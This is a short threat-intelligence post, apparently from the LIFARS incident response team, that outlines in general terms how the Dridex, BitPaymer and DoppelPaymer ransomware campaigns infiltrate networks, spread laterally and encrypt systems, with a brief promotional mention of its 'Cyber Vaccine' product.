Ransomware Fix and Cyber Vaccines – Malware Analysis of Dridex, BitPaymer and DoppelPaymer campaign

BitPaymer and DoppelPaymer campaign

Threat actors are constantly working towards finding new and complex ways to deploy cyber-attacks. The affiliates behind Dridex initially used it as a means to steal banking and personal credentials. However, in order to adapt in the changing cyber crime landscape, the threat actors evolved and developed BitPaymer Ransomware, which uses Dridex for the new purpose of moving laterally and proliferating within a network. Just this past summer, malware analysts found a new evolution of BitPaymer ransomware, called DoppelPaymer.

This version of the ransomware campaign, although it looks very similar, is far more complex than BitPaymer. The LIFARS Incident Response Team summarizes the common initial stages of these ransomware infections, below.

 

“LIFARS.com announced the release of Cyber Vaccine, a new weapon against one of the most prolific organized crime phenomena of the 21st” (NBC2 News)

 

TTP – Tactics, Techniques, and Procedures.

The attackers use many various types of malware and tools, in addition to Dridex, before and during the encryption incident. First, they infiltrate the network (usually via malspam email, or other common and successful phishing tools). Then, they execute malicious code, which is usually hidden in VBA macros of the attached document(s) or in JavaScript code. This malicious code typically downloads Dridex loader or it downloads PowerShell downloader first and then also Dridex loader. These downloaders communicate with short TTL (time to live) geofenced websites for downloading their payload.

The attackers need the connection only for a short time, even as little as one week after the phishing email is delivered. Once this initial download is successful, the attackers use PowerShell Empire and accessible SMB shares or RDP, etc. for lateral movement and spreading across the network (usually undetected by antiviruses and unmonitored network tools). They do this until the objective number and types of machines are infected with Dridex. At this point, it will lay in waiting until the switch flips, the systems become encrypted, and the dreaded ransom note appears.